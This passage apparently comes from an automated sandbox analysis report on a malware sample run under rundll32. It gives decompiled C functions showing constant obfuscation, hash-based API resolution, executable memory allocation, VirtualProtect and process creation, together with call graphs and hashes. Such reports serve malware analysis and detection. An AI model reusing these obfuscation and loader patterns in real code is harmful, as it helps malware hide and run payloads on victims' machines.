                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 1bb1d0a9ce0f6d895f827a8d88b19ef494e72e3d5b923de3fddf5965c7bef492
                                                                      • Instruction ID: d1814a6c4b320e6c0e7a25e209e4dc5e59fbc0f5d2a923c4a9e9138ff8818479
                                                                      • Opcode Fuzzy Hash: 1bb1d0a9ce0f6d895f827a8d88b19ef494e72e3d5b923de3fddf5965c7bef492
                                                                      • Instruction Fuzzy Hash: BB91F072400649EBDF59CF64C9898CE3FA1FF44358F509218FE2A961A0D7B6C999CF84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 46 20004c7-2000565 call 1ff7378 ExitProcess
                                                                      C-Code - Quality: 100%
                                                                      			E020004C7() {
                                                                      				unsigned int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _t48;
                                                                      				signed int _t49;
                                                                      
                                                                      				_v8 = 0xb3b9;
                                                                      				_v8 = _v8 + 0x1dd8;
                                                                      				_v8 = _v8 >> 0xa;
                                                                      				_v8 = _v8 >> 4;
                                                                      				_v8 = _v8 ^ 0x000002ef;
                                                                      				_v20 = 0x5082;
                                                                      				_t48 = 0xc;
                                                                      				_v20 = _v20 / _t48;
                                                                      				_v20 = _v20 ^ 0x00006c35;
                                                                      				_v12 = 0x710;
                                                                      				_v12 = _v12 >> 3;
                                                                      				_t49 = 0x6d;
                                                                      				_v12 = _v12 / _t49;
                                                                      				_v12 = _v12 ^ 0x0000532a;
                                                                      				_v16 = 0x5a4c;
                                                                      				_v16 = _v16 ^ 0xca4a1f4d;
                                                                      				_v16 = _v16 ^ 0xca4a24cd;
                                                                      				E01FF7378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
                                                                      				ExitProcess(0);
                                                                      			}










                                                                      APIs
                                                                      • ExitProcess.KERNEL32(00000000), ref: 02000560
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID: *S$5l$LZ
                                                                      • API String ID: 621844428-1939029103
                                                                      • Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction ID: e4b262c159388f6696a489feb567fc720f0a78e978fad19ceec5f864b40ac6b0
                                                                      • Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction Fuzzy Hash: 6811F771E0520CEBEB04DFE4D84AA9EBBB1EB50714F10C189E514A7294D7F96B548F41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 49 2053928-20539b4 call 20379dc 54 20539b6 49->54 55 20539bd-20539cf GetEnhMetaFileA 49->55 54->55 57 20539d1 55->57 58 20539d8-20539ec 55->58 57->58 59 2053a0e-2053ac5 VirtualAlloc 58->59 60 20539ee-2053a0c 58->60 68 2053acf-2053ada 59->68 60->59 69 2053b21-2053b33 68->69 70 2053adc-2053b1f 68->70 71 2053b75-2053bac 69->71 72 2053b35-2053b73 69->72 70->68 72->71 72->72
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 020539C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,02056CB4,00001000,00000040), ref: 02053A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345
                                                                      • API String ID: 2643768156-4105825235
                                                                      • Opcode ID: 4d3adc2f1cf1f0834a7b93784baba7307adb10a6bef81e2ff702f728e04ea475
                                                                      • Instruction ID: ca6d67a1d76c8353d868f86cc8b08fb5941d57e10ecd5c53ea0ca605c84c39e7
                                                                      • Opcode Fuzzy Hash: 4d3adc2f1cf1f0834a7b93784baba7307adb10a6bef81e2ff702f728e04ea475
                                                                      • Instruction Fuzzy Hash: D9619570E853259FE780DF68E586A273FA9FB04354BC08959E5098B260DF7BA864DF04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 74 2051638-2051641 75 2051643 74->75 76 205164b-20516d1 DdeInitializeA call 2051328 call 2051a14 74->76 75->76 86 20516d6-20516eb 76->86
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 02051686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: bfdc67b36e9c4c0ef12b445dcb8fc8790d10a4a4e7b7a1c4cd18bcd2b9ce1714
                                                                      • Instruction ID: 102dd1c3f1f4a56211691c16e4c62dda2d5b53e1e265d8b3ef48693c814b44d7
                                                                      • Opcode Fuzzy Hash: bfdc67b36e9c4c0ef12b445dcb8fc8790d10a4a4e7b7a1c4cd18bcd2b9ce1714
                                                                      • Instruction Fuzzy Hash: 7A119E70600B11AFE721EB75CD81B4FB7E5EF55700F901828E905DBB60EABAB901AB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 88 24eb40-24eb93 VirtualProtect 89 24eb95-24eba1 88->89 90 24eba6-24ec17 88->90 91 24ec3a-24ec85 call 24e7a0 call 24e7e0 89->91 90->91 108 24ec19-24ec37 90->108 99 24ec90-24ec9a 91->99 100 24ec9c-24eca3 99->100 101 24ecf8-24ed4a call 24e920 99->101 102 24eca5-24ecac 100->102 103 24eced-24ecf6 100->103 111 24ed4c-24ed50 101->111 112 24ed78-24ed7f 101->112 102->103 106 24ecae-24ecea call 24e7e0 102->106 103->99 106->103 108->91 111->112 115 24ed52-24ed75 call 24e880 111->115 116 24ed8a-24ed94 112->116 115->112 117 24ede6-24ee1b call 24f000 116->117 118 24ed96-24ed9d 116->118 120 24ed9f-24eda6 118->120 121 24eddb-24ede4 118->121 120->121 124 24eda8-24edd9 call 24ee20 VirtualProtect 120->124 121->116 124->121
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0024EB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0024EDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: 9108f3255905e2c50fbceff6d599a8fbb1b566fd0b6e7b660debe7efaf51f06c
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 23C1C8B4A10209DFDB48CF88C590EAEB7B6BF88304F158159E819AB351D735EE52CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 129 2051a14-2051a5a call 2051ac8 135 2051a70-2051aa7 DdeCreateStringHandleA DdeNameService 129->135 136 2051a5c-2051a69 129->136 139 2051aaf 135->139 136->135
                                                                      APIs
                                                                        • Part of subcall function 02051AC8: DdeFreeStringHandle.USER32(?,?), ref: 02051AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 02051A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 02051A95
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: 48bd3f3e65ea61ee71d3cec3b1eb1da49123c928072fc80cbfbc101b0d5bb205
                                                                      • Instruction ID: b151ea0f558b62dc6bad685f41c6d064b33f40c121761eab6ec87d08343984d6
                                                                      • Opcode Fuzzy Hash: 48bd3f3e65ea61ee71d3cec3b1eb1da49123c928072fc80cbfbc101b0d5bb205
                                                                      • Instruction Fuzzy Hash: 34118E31710325ABDB12EFA4CC80A5F77EDEF09B00B4005A4FE04EB255D6B1ED0097A4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 140 1ff7f4b-1ff7ffd call 2002550 call 1ff7378 lstrcmpiW
                                                                      C-Code - Quality: 80%
                                                                      			E01FF7F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				unsigned int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				void* _t35;
                                                                      				int _t43;
                                                                      				WCHAR* _t46;
                                                                      
                                                                      				_push(_a12);
                                                                      				_t46 = __ecx;
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t35);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v32 = 0x71485a;
                                                                      				_v28 = 0x57c810;
                                                                      				_v20 = 0x2813;
                                                                      				_v20 = _v20 * 0x59;
                                                                      				_v20 = _v20 ^ 0x000dd428;
                                                                      				_v16 = 0xdb84;
                                                                      				_v16 = _v16 | 0xe2c96d38;
                                                                      				_v16 = _v16 ^ 0xe2c994d7;
                                                                      				_v12 = 0xc19e;
                                                                      				_v12 = _v12 >> 7;
                                                                      				_v12 = _v12 ^ 0x000060ae;
                                                                      				_v8 = 0x265e;
                                                                      				_v8 = _v8 + 0x315a;
                                                                      				_v8 = _v8 << 0xb;
                                                                      				_v8 = _v8 ^ 0x02bd94c0;
                                                                      				E01FF7378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
                                                                      				_t43 = lstrcmpiW(_t46, _a4); // executed
                                                                      				return _t43;
                                                                      			}














                                                                      APIs
                                                                      • lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 01FF7FF7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: ZHq
                                                                      • API String ID: 1586166983-2177431251
                                                                      • Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction ID: 95dc4129b8c9b7350b193ba354ecb56fd3d1da8b3ad54597fa8731147189f0d9
                                                                      • Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction Fuzzy Hash: 5B11DFB6C01219BBEF01EFA4C94A8DEBFB4EF04318F108588E92466251D3B95B15DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 145 24e620-24e66b call 24ea10 148 24e66d-24e677 call 24ea10 145->148 149 24e67a-24e6aa call 24e390 VirtualAlloc 145->149 148->149
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0024E6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: 94eaf2dbce76cd2387fc3ea58d4fa8236348bd978d5e8a14bd27de2a49caafab
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 0E111260D082C9DEFF01DBE894097FFBFB56F21704F044098D5456B282D6BA57588BB6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 155 200b86e-200b949 call 2002550 call 1ff7378 CreateProcessW
                                                                      C-Code - Quality: 40%
                                                                      			E0200B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
                                                                      				signed int _v8;
                                                                      				unsigned int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t49;
                                                                      				int _t58;
                                                                      				signed int _t60;
                                                                      				int _t65;
                                                                      
                                                                      				_push(_a68);
                                                                      				_t65 = __ecx;
                                                                      				_push(0);
                                                                      				_push(_a60);
                                                                      				_push(_a56);
                                                                      				_push(_a52);
                                                                      				_push(_a48);
                                                                      				_push(_a44);
                                                                      				_push(_a40);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(_a24);
                                                                      				_push(0);
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t49);
                                                                      				_v12 = 0xd1fa;
                                                                      				_t60 = 0x3c;
                                                                      				_v12 = _v12 / _t60;
                                                                      				_v12 = _v12 >> 0xa;
                                                                      				_v12 = _v12 ^ 0x00001682;
                                                                      				_v20 = 0xd4c2;
                                                                      				_v20 = _v20 + 0x3986;
                                                                      				_v20 = _v20 ^ 0x00013905;
                                                                      				_v8 = 0x8c53;
                                                                      				_v8 = _v8 >> 4;
                                                                      				_v8 = _v8 << 1;
                                                                      				_v8 = _v8 ^ 0x000060d6;
                                                                      				_v16 = 0x467b;
                                                                      				_v16 = _v16 + 0xffff2b71;
                                                                      				_v16 = _v16 ^ 0xffff105c;
                                                                      				E01FF7378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
                                                                      				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
                                                                      				return _t58;
                                                                      			}











                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0200B942
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction ID: f2a587d58244c9be459cf44d469b377bdf4ad0f5d92e2352495b40eda2cd12b4
                                                                      • Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction Fuzzy Hash: 0721C472800248BBEF159F95CD09CDFBFB9FF89714F408158FA1466260D7B69A60DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 160 1ff471a-1ff47ea call 2002550 call 1ff7378 SHGetFolderPathW
                                                                      C-Code - Quality: 58%
                                                                      			E01FF471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t50;
                                                                      				intOrPtr* _t61;
                                                                      				void* _t62;
                                                                      				signed int _t63;
                                                                      				signed int _t64;
                                                                      
                                                                      				E02002550(_t50);
                                                                      				_v20 = 0xf336;
                                                                      				_v20 = _v20 + 0x29f7;
                                                                      				_v20 = _v20 ^ 0x000152a0;
                                                                      				_v8 = 0xc9c4;
                                                                      				_v8 = _v8 >> 0x10;
                                                                      				_v8 = _v8 << 3;
                                                                      				_t63 = 0x6d;
                                                                      				_v8 = _v8 * 0x43;
                                                                      				_v8 = _v8 ^ 0x0000467c;
                                                                      				_v16 = 0x763b;
                                                                      				_t64 = 0x2d;
                                                                      				_v16 = _v16 / _t63;
                                                                      				_v16 = _v16 << 4;
                                                                      				_v16 = _v16 ^ 0x000058e5;
                                                                      				_v12 = 0x527e;
                                                                      				_v12 = _v12 / _t64;
                                                                      				_v12 = _v12 | 0xd776a7a3;
                                                                      				_v12 = _v12 ^ 0xd776f938;
                                                                      				_t61 = E01FF7378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
                                                                      				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
                                                                      				return _t62;
                                                                      			}












                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 01FF47E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FolderPath
                                                                      • String ID:
                                                                      • API String ID: 1514166925-0
                                                                      • Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction ID: 1a88c1d8ed51b6097d23ccce26c076287bbe3dadd5d3f1899b9891b62f7bab5b
                                                                      • Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction Fuzzy Hash: A721F272D01218BBEF05DFE4C84A8DEBBB5EF05354F108089E924A6290D3B59B10DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      C-Code - Quality: 98%
                                                                      			E02005250() {
                                                                      				char _v68;
                                                                      				signed int _v72;
                                                                      				intOrPtr _v76;
                                                                      				intOrPtr _v80;
                                                                      				intOrPtr _v84;
                                                                      				intOrPtr _v88;
                                                                      				void* _v96;
                                                                      				char _v104;
                                                                      				signed int _v108;
                                                                      				signed int _v112;
                                                                      				intOrPtr _v116;
                                                                      				intOrPtr _v120;
                                                                      				intOrPtr _v124;
                                                                      				char _v128;
                                                                      				intOrPtr _v132;
                                                                      				char _v140;
                                                                      				void* _v148;
                                                                      				char _v156;
                                                                      				char _v160;
                                                                      				char _v164;
                                                                      				signed int _v168;
                                                                      				signed int _v172;
                                                                      				signed int _v176;
                                                                      				signed int _v180;
                                                                      				signed int _v184;
                                                                      				signed int _v188;
                                                                      				signed int _v192;
                                                                      				signed int _v196;
                                                                      				signed int _v200;
                                                                      				signed int _v204;
                                                                      				signed int _v208;
                                                                      				signed int _v212;
                                                                      				signed int _v216;
                                                                      				signed int _v220;
                                                                      				unsigned int _v224;
                                                                      				signed int _v228;
                                                                      				signed int _v232;
                                                                      				signed int _v236;
                                                                      				signed int _v240;
                                                                      				unsigned int _v244;
                                                                      				signed int _v248;
                                                                      				unsigned int _v252;
                                                                      				signed int _v256;
                                                                      				signed int _v260;
                                                                      				signed int _v264;
                                                                      				signed int _v268;
                                                                      				signed int _v272;
                                                                      				signed int _v276;
                                                                      				signed int _v280;
                                                                      				signed int _v284;
                                                                      				signed int _v288;
                                                                      				signed int _v292;
                                                                      				signed int _v296;
                                                                      				signed int _v300;
                                                                      				signed int _v304;
                                                                      				signed int _v308;
                                                                      				signed int _v312;
                                                                      				signed int _v316;
                                                                      				signed int _v320;
                                                                      				signed int _v324;
                                                                      				signed int _v328;
                                                                      				signed int _v332;
                                                                      				signed int _v336;
                                                                      				signed int _v340;
                                                                      				signed int _v344;
                                                                      				signed int _v348;
                                                                      				signed int _v352;
                                                                      				signed int _v356;
                                                                      				unsigned int _v360;
                                                                      				unsigned int _v364;
                                                                      				signed int _v368;
                                                                      				signed int _v372;
                                                                      				signed int _v376;
                                                                      				signed int _v380;
                                                                      				signed int _v384;
                                                                      				signed int _v388;
                                                                      				signed int _v392;
                                                                      				signed int _v396;
                                                                      				signed int _v400;
                                                                      				signed int _v404;
                                                                      				signed int _v408;
                                                                      				signed int _v412;
                                                                      				signed int _v416;
                                                                      				signed int _v420;
                                                                      				signed int _v424;
                                                                      				signed int _v428;
                                                                      				signed int _v432;
                                                                      				signed int _v436;
                                                                      				signed int _v440;
                                                                      				signed int _v444;
                                                                      				signed int _v448;
                                                                      				signed int _v452;
                                                                      				signed int _v456;
                                                                      				signed int _v460;
                                                                      				signed int _v464;
                                                                      				signed int _v468;
                                                                      				signed int _v472;
                                                                      				signed int _v476;
                                                                      				signed int _v480;
                                                                      				signed int _v484;
                                                                      				signed int _v488;
                                                                      				signed int _v492;
                                                                      				signed int _v496;
                                                                      				signed int _v500;
                                                                      				unsigned int _v504;
                                                                      				signed int _v508;
                                                                      				signed int _v512;
                                                                      				signed int _v516;
                                                                      				signed int _v520;
                                                                      				signed int _v524;
                                                                      				signed int _v528;
                                                                      				signed int _v532;
                                                                      				signed int _v536;
                                                                      				signed int _v540;
                                                                      				signed int _v544;
                                                                      				signed int _v548;
                                                                      				void* __ebx;
                                                                      				intOrPtr _t927;
                                                                      				intOrPtr _t947;
                                                                      				signed int _t1117;
                                                                      				signed int _t1118;
                                                                      				signed int _t1121;
                                                                      				signed int _t1122;
                                                                      				signed int _t1123;
                                                                      				signed int _t1124;
                                                                      				signed int _t1125;
                                                                      				signed int _t1126;
                                                                      				signed int _t1127;
                                                                      				signed int _t1128;
                                                                      				signed int _t1129;
                                                                      				signed int _t1130;
                                                                      				signed int _t1131;
                                                                      				signed int _t1132;
                                                                      				signed int _t1133;
                                                                      				signed int _t1134;
                                                                      				signed int _t1135;
                                                                      				signed int _t1136;
                                                                      				signed int _t1137;
                                                                      				signed int _t1138;
                                                                      				signed int _t1143;
                                                                      				void* _t1145;
                                                                      				void* _t1148;
                                                                      				void* _t1149;
                                                                      				void* _t1150;
                                                                      
                                                                      				_t1145 = (_t1143 & 0xfffffff8) - 0x220;
                                                                      				_v72 = _v72 & 0x00000000;
                                                                      				_v84 = 0x209410;
                                                                      				_t1034 = 0x12e722cf;
                                                                      				_v80 = 0x7fb3a;
                                                                      				_v76 = 0x87a05;
                                                                      				_v476 = 0x6f2d;
                                                                      				_v476 = _v476 ^ 0x017c3002;
                                                                      				_v476 = _v476 + 0xffffbd18;
                                                                      				_v476 = _v476 | 0xc91499cd;
                                                                      				_v476 = _v476 ^ 0xc97c9eea;
                                                                      				_v280 = 0x77b6;
                                                                      				_v280 = _v280 + 0x5656;
                                                                      				_v280 = _v280 ^ 0x000089ef;
                                                                      				_v380 = 0x736f;
                                                                      				_v380 = _v380 << 2;
                                                                      				_v380 = _v380 + 0x5e6a;
                                                                      				_v380 = _v380 ^ 0x00026114;
                                                                      				_v216 = 0xcbd1;
                                                                      				_v216 = _v216 ^ 0x44eba388;
                                                                      				_v216 = _v216 ^ 0x44eb05d5;
                                                                      				_v296 = 0xc4c6;
                                                                      				_v296 = _v296 + 0x2d2;
                                                                      				_v296 = _v296 ^ 0x0000e1e8;
                                                                      				_v288 = 0x42e8;
                                                                      				_t1121 = 0x3f;
                                                                      				_v288 = _v288 / _t1121;
                                                                      				_v288 = _v288 ^ 0x00000dcd;
                                                                      				_v244 = 0x282;
                                                                      				_v244 = _v244 >> 6;
                                                                      				_v244 = _v244 ^ 0x0000405b;
                                                                      				_v252 = 0x771a;
                                                                      				_v252 = _v252 >> 0xe;
                                                                      				_v252 = _v252 ^ 0x00001031;
                                                                      				_v492 = 0xf437;
                                                                      				_v492 = _v492 >> 3;
                                                                      				_t1122 = 0x61;
                                                                      				_v492 = _v492 / _t1122;
                                                                      				_v492 = _v492 + 0xffff3f4e;
                                                                      				_v492 = _v492 ^ 0xffff2cd5;
                                                                      				_v192 = 0x3176;
                                                                      				_v192 = _v192 + 0x69b1;
                                                                      				_v192 = _v192 ^ 0x0000ea14;
                                                                      				_v420 = 0xc417;
                                                                      				_v420 = _v420 + 0x8980;
                                                                      				_v420 = _v420 ^ 0xd4e62d65;
                                                                      				_v420 = _v420 ^ 0xd4e7684b;
                                                                      				_v212 = 0x15f4;
                                                                      				_v212 = _v212 * 0x22;
                                                                      				_v212 = _v212 ^ 0x0002e648;
                                                                      				_v456 = 0xe852;
                                                                      				_v456 = _v456 >> 0xd;
                                                                      				_v456 = _v456 + 0xffffcc84;
                                                                      				_v456 = _v456 << 0xe;
                                                                      				_v456 = _v456 ^ 0xf322a6d4;
                                                                      				_v536 = 0x2d0a;
                                                                      				_v536 = _v536 ^ 0xa9ca95e4;
                                                                      				_v536 = _v536 * 0xe;
                                                                      				_v536 = _v536 + 0xcaaf;
                                                                      				_v536 = _v536 ^ 0x4916b696;
                                                                      				_v224 = 0xd1a0;
                                                                      				_v224 = _v224 >> 0xc;
                                                                      				_v224 = _v224 ^ 0x00006736;
                                                                      				_v184 = 0xb552;
                                                                      				_v184 = _v184 ^ 0x240384b8;
                                                                      				_v184 = _v184 ^ 0x24037a21;
                                                                      				_v472 = 0x9384;
                                                                      				_t1117 = 0x52;
                                                                      				_v472 = _v472 / _t1117;
                                                                      				_v472 = _v472 + 0x4a96;
                                                                      				_v472 = _v472 ^ 0xcc9e8605;
                                                                      				_v472 = _v472 ^ 0xcc9ec215;
                                                                      				_v236 = 0x7622;
                                                                      				_v236 = _v236 + 0xffff4cbc;
                                                                      				_v236 = _v236 ^ 0xfffff78f;
                                                                      				_v548 = 0xb822;
                                                                      				_v548 = _v548 ^ 0x5a18f77c;
                                                                      				_v548 = _v548 + 0xffff6a91;
                                                                      				_t1123 = 6;
                                                                      				_v548 = _v548 * 0x46;
                                                                      				_v548 = _v548 ^ 0xa27cfa0f;
                                                                      				_v428 = 0x9f04;
                                                                      				_v428 = _v428 * 0x35;
                                                                      				_v428 = _v428 + 0xde16;
                                                                      				_v428 = _v428 ^ 0x0021bdfd;
                                                                      				_v516 = 0xd39a;
                                                                      				_v516 = _v516 / _t1123;
                                                                      				_v516 = _v516 + 0x15af;
                                                                      				_t1124 = 0x59;
                                                                      				_v516 = _v516 / _t1124;
                                                                      				_v516 = _v516 ^ 0x00007e9e;
                                                                      				_v308 = 0xa16d;
                                                                      				_v308 = _v308 + 0xe711;
                                                                      				_v308 = _v308 + 0xffff4f28;
                                                                      				_v308 = _v308 ^ 0x00009f4e;
                                                                      				_v532 = 0x7266;
                                                                      				_t1125 = 0x28;
                                                                      				_v532 = _v532 / _t1125;
